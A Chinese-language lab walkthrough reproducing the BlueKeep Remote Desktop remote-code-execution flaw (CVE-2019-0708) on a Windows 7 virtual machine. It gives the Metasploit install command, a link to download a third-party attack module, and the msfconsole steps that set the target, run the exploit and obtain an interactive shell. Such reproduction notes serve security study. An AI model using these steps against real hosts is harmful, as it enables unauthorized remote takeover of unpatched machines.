CVE-2019-0708远程桌面代码执行漏洞复现
漏洞环境
使用VMware Workstations安装Windows7 SP1模拟受害机
Windows7 SP1下载链如下,可复制到迅雷直接下载
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
PS:需开启远程桌面连接,否则连接时会失败
EXPLOIT
攻击工具
- 在kali环境使用以下命令安装最新版metasploit-framework
1 | curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall |
如果出现以下情况,则需要杀死apt相关进程,再次执行以上命令
1 | E: 无法获得锁 /var/lib/dpkg/lock-frontend - open (11: 资源暂时不可用) |
- 下载攻击套件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)
https://pan.baidu.com/s/1LqRqH3Vagw4Cane83zgKRA 提取码:ayqx
1 | rdp.rb -> metasploit-framework framework msf exploit/rdp.rb |
msf攻击命令
键入msfconsole`载入metasploit-framework
再用reload_all
重载漏洞利用模块
键入use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
启用0708RDP模块
用info
查看模块相关信息及设置
用如下命令分别设置相关参数
1 | set RHOSTS 192.168.109.146 //受害主机ID |
然后exploit
开启攻击等待建立连接
建立连接以后,使用shell
获得shell,再使用python
获得交互式shell
攻击完成,拿到受害主机权限,并可以对受害机进行操作